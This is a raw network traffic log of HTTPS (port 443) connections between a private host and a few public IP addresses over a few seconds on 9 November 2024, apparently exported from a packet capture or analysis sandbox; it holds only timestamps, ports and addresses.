Nov 9, 2024 02:47:23.560501099 CET	443	49754	4.245.163.56	192.168.2.7
Nov 9, 2024 02:47:23.560508013 CET	49754	443	192.168.2.7	4.245.163.56
Nov 9, 2024 02:47:23.560522079 CET	443	49754	4.245.163.56	192.168.2.7
Nov 9, 2024 02:47:23.560529947 CET	443	49754	4.245.163.56	192.168.2.7
Nov 9, 2024 02:47:23.560554981 CET	49754	443	192.168.2.7	4.245.163.56
Nov 9, 2024 02:47:23.560878992 CET	49754	443	192.168.2.7	4.245.163.56
Nov 9, 2024 02:47:23.560883999 CET	443	49754	4.245.163.56	192.168.2.7
Nov 9, 2024 02:47:23.602804899 CET	49754	443	192.168.2.7	4.245.163.56
Nov 9, 2024 02:47:23.632375002 CET	443	49764	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:23.633239985 CET	49764	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:23.633255005 CET	443	49764	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:23.633539915 CET	49764	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:23.633546114 CET	443	49764	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:23.665849924 CET	443	49754	4.245.163.56	192.168.2.7
Nov 9, 2024 02:47:23.665923119 CET	443	49754	4.245.163.56	192.168.2.7
Nov 9, 2024 02:47:23.666059971 CET	49754	443	192.168.2.7	4.245.163.56
Nov 9, 2024 02:47:23.770560980 CET	443	49764	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:23.770649910 CET	443	49764	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:23.770788908 CET	49764	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:23.773469925 CET	49764	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:23.773483038 CET	443	49764	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:23.773509979 CET	49764	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:23.773515940 CET	443	49764	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:23.787117004 CET	443	49766	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:23.790198088 CET	49766	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:23.790221930 CET	443	49766	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:23.790594101 CET	49766	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:23.790601015 CET	443	49766	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:23.792668104 CET	49771	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:23.792699099 CET	443	49771	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:23.792795897 CET	49771	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:23.793217897 CET	49771	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:23.793226004 CET	443	49771	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:23.888736963 CET	443	49767	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:23.891978025 CET	49767	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:23.892003059 CET	443	49767	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:23.893832922 CET	49767	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:23.893838882 CET	443	49767	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:23.921343088 CET	443	49766	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:23.921413898 CET	443	49766	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:23.921571970 CET	49766	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:23.921694040 CET	49766	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:23.921708107 CET	443	49766	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:23.921785116 CET	49766	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:23.921789885 CET	443	49766	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:23.926340103 CET	49772	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:23.926362991 CET	443	49772	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:23.926589012 CET	49772	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:23.926834106 CET	49772	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:23.926845074 CET	443	49772	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:24.016150951 CET	443	49769	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:24.020942926 CET	443	49767	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:24.021013975 CET	443	49767	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:24.021205902 CET	49767	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:24.028028011 CET	49767	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:24.028028011 CET	49767	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:24.028049946 CET	443	49767	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:24.028059006 CET	443	49767	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:24.028235912 CET	49769	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:24.028247118 CET	443	49769	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:24.028918028 CET	49769	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:24.028923035 CET	443	49769	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:24.032408953 CET	49773	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:24.032440901 CET	443	49773	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:24.032638073 CET	49773	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:24.032638073 CET	49773	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:24.032668114 CET	443	49773	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:24.156155109 CET	443	49769	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:24.156230927 CET	443	49769	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:24.156279087 CET	49769	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:24.157583952 CET	49769	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:24.157604933 CET	443	49769	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:24.157675982 CET	49769	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:24.157682896 CET	443	49769	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:24.163516045 CET	49774	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:24.163559914 CET	443	49774	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:24.163716078 CET	49774	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:24.164202929 CET	49774	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:24.164216995 CET	443	49774	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:24.222151041 CET	49754	443	192.168.2.7	4.245.163.56
Nov 9, 2024 02:47:24.222177982 CET	443	49754	4.245.163.56	192.168.2.7
Nov 9, 2024 02:47:24.544647932 CET	443	49771	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:24.552769899 CET	49771	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:24.552778959 CET	443	49771	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:24.555582047 CET	49771	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:24.555587053 CET	443	49771	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:24.662969112 CET	443	49765	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:24.680140018 CET	443	49772	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:24.683284998 CET	443	49771	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:24.683964014 CET	443	49771	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:24.684037924 CET	49771	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:24.712157011 CET	49765	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:24.727786064 CET	49772	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:24.788635015 CET	443	49773	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:24.837169886 CET	49773	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:24.873800039 CET	49773	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:24.873811007 CET	443	49773	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:24.874298096 CET	49773	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:24.874303102 CET	443	49773	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:24.874597073 CET	49765	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:24.874619961 CET	443	49765	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:24.875010967 CET	49765	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:24.875016928 CET	443	49765	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:24.884268999 CET	49772	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:24.884279013 CET	443	49772	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:24.884685040 CET	49772	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:24.884691000 CET	443	49772	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:24.885143042 CET	49771	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:24.885143042 CET	49771	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:24.885170937 CET	443	49771	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:24.885181904 CET	443	49771	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:24.914490938 CET	443	49774	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:24.918591022 CET	49774	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:24.918600082 CET	443	49774	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:24.919465065 CET	49774	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:24.919471025 CET	443	49774	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:24.984615088 CET	49775	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:24.984657049 CET	443	49775	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:24.984740019 CET	49775	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:24.991370916 CET	49775	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:24.991389990 CET	443	49775	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:25.002835989 CET	443	49765	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:25.003700972 CET	443	49765	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:25.003770113 CET	49765	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:25.004009962 CET	49765	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:25.004023075 CET	443	49765	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:25.004036903 CET	49765	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:25.004041910 CET	443	49765	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:25.007338047 CET	443	49773	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:25.008321047 CET	443	49773	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:25.008400917 CET	49773	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:25.008771896 CET	49773	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:25.008771896 CET	49773	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:25.008789062 CET	443	49773	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:25.008797884 CET	443	49773	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:25.010611057 CET	49776	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:25.010644913 CET	443	49776	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:25.010727882 CET	49776	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:25.011027098 CET	49776	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:25.011039972 CET	443	49776	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:25.020787001 CET	443	49772	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:25.020844936 CET	443	49772	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:25.020896912 CET	49772	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:25.048444986 CET	443	49774	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:25.048682928 CET	443	49774	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:25.048744917 CET	49774	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:25.133694887 CET	49772	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:25.133707047 CET	443	49772	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:25.133718014 CET	49772	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:25.133723021 CET	443	49772	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:25.184987068 CET	49774	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:25.184987068 CET	49774	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:25.184997082 CET	443	49774	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:25.185004950 CET	443	49774	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:25.250482082 CET	49777	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:25.250524044 CET	443	49777	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:25.250646114 CET	49777	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:25.266463041 CET	49778	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:25.266494989 CET	443	49778	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:25.266601086 CET	49778	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:25.271446943 CET	49777	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:25.271464109 CET	443	49777	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:25.279609919 CET	49778	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:25.279623985 CET	443	49778	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:25.411593914 CET	49779	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:25.411616087 CET	443	49779	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:25.411675930 CET	49779	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:25.601752996 CET	49779	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:25.601773024 CET	443	49779	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:25.712698936 CET	443	49775	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:25.733649969 CET	443	49776	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:25.758512974 CET	49775	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:25.783977032 CET	49776	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:25.921149969 CET	49775	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:25.921175957 CET	443	49775	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:25.921583891 CET	49775	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:25.921588898 CET	443	49775	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:25.930799007 CET	49776	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:25.930808067 CET	443	49776	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:25.931272030 CET	49776	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:25.931277037 CET	443	49776	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:25.951826096 CET	49780	443	192.168.2.7	94.245.104.56
Nov 9, 2024 02:47:25.951869011 CET	443	49780	94.245.104.56	192.168.2.7
Nov 9, 2024 02:47:25.951946020 CET	49780	443	192.168.2.7	94.245.104.56
Nov 9, 2024 02:47:25.980412960 CET	49780	443	192.168.2.7	94.245.104.56
Nov 9, 2024 02:47:25.980427980 CET	443	49780	94.245.104.56	192.168.2.7
Nov 9, 2024 02:47:26.013200998 CET	443	49778	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:26.014286041 CET	443	49777	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:26.039490938 CET	49778	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:26.039505005 CET	443	49778	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:26.039998055 CET	49778	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:26.040002108 CET	443	49778	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:26.040894985 CET	49777	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:26.040925026 CET	443	49777	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:26.041297913 CET	49777	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:26.041302919 CET	443	49777	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:26.046550035 CET	443	49775	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:26.047435045 CET	443	49775	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:26.047698021 CET	49775	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:26.047738075 CET	49775	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:26.047738075 CET	49775	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:26.047759056 CET	443	49775	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:26.047768116 CET	443	49775	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:26.054462910 CET	443	49776	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:26.054714918 CET	443	49776	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:26.054780006 CET	49776	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:26.054965019 CET	49776	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:26.054965019 CET	49776	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:26.054980040 CET	443	49776	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:26.054987907 CET	443	49776	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:26.169702053 CET	443	49777	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:26.170809031 CET	443	49777	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:26.171077013 CET	49777	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:26.180237055 CET	443	49778	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:26.180491924 CET	443	49778	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:26.180660963 CET	49778	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:26.292244911 CET	49777	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:26.292244911 CET	49777	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:26.292262077 CET	443	49777	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:26.292272091 CET	443	49777	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:26.302444935 CET	49778	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:26.302458048 CET	443	49778	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:26.313725948 CET	49787	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:26.313776970 CET	443	49787	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:26.313843966 CET	49787	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:26.332986116 CET	443	49779	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:26.336678028 CET	49788	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:26.336704016 CET	443	49788	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:26.336776972 CET	49788	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:26.340512037 CET	49789	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:26.340528011 CET	443	49789	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:26.340684891 CET	49789	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:26.341809034 CET	49789	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:26.341820002 CET	443	49789	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:26.342009068 CET	49787	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:26.342029095 CET	443	49787	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:26.347007036 CET	49790	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:26.347018003 CET	443	49790	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:26.347172022 CET	49790	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:26.347337961 CET	49779	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:26.347356081 CET	443	49779	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:26.347364902 CET	49790	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:26.347373009 CET	443	49790	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:26.347745895 CET	49779	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:26.347754002 CET	443	49779	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:26.364317894 CET	49788	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:26.364332914 CET	443	49788	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:26.474065065 CET	443	49779	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:26.474159956 CET	443	49779	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:26.474268913 CET	49779	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:26.570050001 CET	49779	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:26.570074081 CET	443	49779	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:26.659992933 CET	49791	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:26.660048962 CET	443	49791	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:26.660104036 CET	49791	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:26.669056892 CET	49791	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:26.669075012 CET	443	49791	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:27.040113926 CET	443	49780	94.245.104.56	192.168.2.7
Nov 9, 2024 02:47:27.086041927 CET	443	49788	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:27.091902018 CET	443	49789	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:27.094885111 CET	443	49787	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:27.108338118 CET	443	49790	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:27.249440908 CET	49787	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:27.249443054 CET	49789	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:27.249447107 CET	49788	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:27.249464035 CET	49780	443	192.168.2.7	94.245.104.56
Nov 9, 2024 02:47:27.281971931 CET	49790	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:27.331224918 CET	49780	443	192.168.2.7	94.245.104.56
Nov 9, 2024 02:47:27.331243992 CET	443	49780	94.245.104.56	192.168.2.7
Nov 9, 2024 02:47:27.332586050 CET	443	49780	94.245.104.56	192.168.2.7
Nov 9, 2024 02:47:27.332602978 CET	443	49780	94.245.104.56	192.168.2.7
Nov 9, 2024 02:47:27.332684994 CET	49780	443	192.168.2.7	94.245.104.56
Nov 9, 2024 02:47:27.401139975 CET	443	49791	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:27.438465118 CET	49780	443	192.168.2.7	94.245.104.56
Nov 9, 2024 02:47:27.474039078 CET	49791	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:27.474062920 CET	443	49791	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:27.474145889 CET	49789	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:27.474157095 CET	443	49789	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:27.474630117 CET	49789	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:27.474634886 CET	443	49789	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:27.474750042 CET	49791	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:27.474754095 CET	443	49791	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:27.474870920 CET	49790	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:27.474901915 CET	443	49790	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:27.475239992 CET	49790	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:27.475248098 CET	443	49790	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:27.475272894 CET	49788	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:27.475286961 CET	443	49788	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:27.475522995 CET	49787	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:27.475542068 CET	443	49787	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:27.475666046 CET	49788	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:27.475672007 CET	443	49788	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:27.475984097 CET	49787	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:27.475989103 CET	443	49787	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:27.519685030 CET	49780	443	192.168.2.7	94.245.104.56
Nov 9, 2024 02:47:27.519876957 CET	443	49780	94.245.104.56	192.168.2.7
Nov 9, 2024 02:47:27.540920973 CET	49780	443	192.168.2.7	94.245.104.56
Nov 9, 2024 02:47:27.540937901 CET	443	49780	94.245.104.56	192.168.2.7
Nov 9, 2024 02:47:27.614177942 CET	443	49788	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:27.614274979 CET	443	49788	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:27.614320040 CET	443	49791	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:27.614327908 CET	49788	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:27.615412951 CET	443	49790	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:27.615422010 CET	443	49791	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:27.615479946 CET	49791	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:27.615495920 CET	443	49790	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:27.615542889 CET	49790	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:27.616348982 CET	443	49789	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:27.616430044 CET	443	49789	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:27.616472960 CET	49789	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:27.619322062 CET	443	49787	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:27.619380951 CET	443	49787	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:27.619425058 CET	49787	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:27.736696959 CET	49788	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:27.736735106 CET	443	49788	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:27.738590002 CET	49789	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:27.738632917 CET	443	49789	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:27.738652945 CET	49789	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:27.738661051 CET	443	49789	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:27.740098953 CET	49787	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:27.740117073 CET	443	49787	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:27.740128040 CET	49787	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:27.740134954 CET	443	49787	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:27.741168976 CET	49791	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:27.741173983 CET	443	49791	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:27.741185904 CET	49791	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:27.741189003 CET	443	49791	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:27.742655993 CET	49780	443	192.168.2.7	94.245.104.56
Nov 9, 2024 02:47:27.751794100 CET	49790	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:27.751807928 CET	443	49790	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:27.751821995 CET	49790	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:27.751828909 CET	443	49790	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:27.777055025 CET	443	49780	94.245.104.56	192.168.2.7
Nov 9, 2024 02:47:27.845756054 CET	49795	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:27.845812082 CET	443	49795	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:27.845890999 CET	49795	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:27.846560001 CET	49796	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:27.846617937 CET	443	49796	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:27.846688986 CET	49796	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:27.847218037 CET	49780	443	192.168.2.7	94.245.104.56
